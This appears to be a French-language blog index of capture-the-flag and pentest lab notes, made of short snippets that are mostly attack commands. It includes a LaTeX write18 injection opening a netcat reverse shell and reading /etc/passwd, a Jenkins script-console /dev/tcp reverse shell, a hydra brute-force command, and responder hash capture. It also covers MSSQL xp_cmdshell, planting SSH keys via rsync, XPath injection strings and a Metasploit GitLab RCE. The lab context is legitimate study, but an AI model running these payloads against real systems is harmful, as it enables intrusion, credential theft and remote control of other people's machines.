Germain OpenBSD devs patch authentication bypass bug Il y a un bug dans l’utilitaire check_auth. En utilisant le username -schallenge, nous pouvons nous connecter. Il y a aussi un 2e exploit, xlock privilege escalation qui nous donne les droits de l’administrateur.
Lire le fichier /etc/passwd \newread\file \openin\file=/etc/passwd \read\file to\line \text{\line} \closein\file Exécuter une commande \immediate\write18{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.60 3333 >/tmp/f}
On peut se connecter via linux à un server mssql via l’utilitaire mssqlclient.py qui est inclus avec impacket mssqlclient.py -windows-auth nomdelordi/reporting@10.9.0.60 enable_xp_cmdshell Si nous n’avons pas la permission, nous pouvons utiliser l’outil responder pour obtenir le NTLMv2-SSP Hashh. L’outil s’exécute sur l’ordinateur de l’attaquant (10.9.0.60) responder -I tun0 Et puis nous faisons une requête sur … Continuer la lecture
On peut tenter de trouver le mot de passe de Jenkins. On intercepte une requête de connexion dans burp On utilise hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm -s 8888 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" Jenkins/Manage Jenkins/Script Console r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.9.0.60/9999;cat <&5 | while read line; do \$line 2>&5 >&5; done"] … Continuer la lecture
redis-cli -h 10.9.0.60 -a “monmotdepasse” 10.9.0.60:6379> KEYS * 1) “tmp” 2) “marketlist” 3) “authlist” 4) “internal flag” 5) “int” 10.9.0.60:6379> 10.9.0.60:6379> KEYS “internal flag” 1) “internal flag” 10.10.190.83:6379> GET “internal flag” r0cker_is_the_best 10.9.0.60:6379> KEYS * 1) “internal flag” 2) “authlist” 3) “marketlist” 4) “int” 5) “tmp” 10.10.190.83:6379> GET authlist (error) WRONGTYPE Operation against a key … Continuer la lecture
rsync –list-only rsync://10.9.0.60 rsync –list-only rsync://rsync-connect@10.9.0.60/files #on entre le mot de passe rsync authorized_keys rsync://rsync-connect@10.9.0.60/files/sys-internal/.ssh
en supposant la clé privée dans ca.key openssl s_client -connect 10.129.79.144:443 2>/dev/null #obtention du certificat public openssl pkcs12 -inkey ca.key -in certificate.pem -export -out cert.p12 # on ajoute par la suite le certificat dans le navigateur (certificate manager)
wget –mirror -I .git $TARGET_IP/.git/ git status git reset HEAD –hard git log –oneline –graph git checkout 395e088
On puet essayer d’entrer comme ceci nom et n’importe quoi comme mot de passe x" or 1=1 or "a"="a x' or 1=1 or 'a'='a https://owasp.org/www-community/attacks/XPATH_Injection https://book.hacktricks.xyz/pentesting-web/xpath-injection https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
IL existe certaines versions de GitLab Community Edition Vulnerable. Par exemple, la version 12.8.1 est vulnérable use exploit/multi/http/gitlab_file_read_rce set rhosts 10.9.0.69 set rport 443 set vhost git.searchevolution.com set username r0cker set password blabla set ssl true set lhost 10.9.0.60 exploit bash -i Par la suite, on est dans un shell, mais nous ne pouvons faire … Continuer la lecture